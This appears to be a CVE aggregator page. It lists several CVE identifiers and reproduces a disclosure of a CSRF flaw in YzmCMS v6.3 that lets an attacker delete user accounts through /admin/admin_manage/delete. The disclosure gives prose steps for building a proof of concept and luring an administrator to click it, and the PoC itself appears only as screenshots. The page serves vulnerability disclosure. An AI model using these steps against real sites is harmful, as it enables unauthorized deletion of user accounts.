CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

YzmCMS v6.3 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete user accounts via /admin/admin_manage/delete.

This vulnerability allows arbitrary users to be deleted,  
There is a user with ID 3,  
![image](https://user-images.githubusercontent.com/89461075/150460342-a09eccf1-8611-42e2-a52d-336b307df441.png)

Click delete and capture the package to generate the POC of CSRF,  
![image](https://user-images.githubusercontent.com/89461075/150460532-43e70395-68f9-4c5d-aa8c-f9c208b44627.png)

Package the deletion request to dorp, and put the generated POC in the HTML page and send it to the administrator. When the administrator clicks the page, the user with ID 3 can be deleted.  
![image](https://user-images.githubusercontent.com/89461075/150460730-d7dca3d2-d913-4ce7-9d69-be0096f2092f.png)  
![image](https://user-images.githubusercontent.com/89461075/150460754-0f9e1660-4bb4-428d-bea6-ce66e30fc9df.png)

Headline

CVE-2022-23887: YzmCMS V6. 3. CSRF vulnerability exists in the official version(YzmCMS V6.3 正式版存在csrf漏洞) · Issue #59 · yzmcms/yzmcms

CVE: Latest News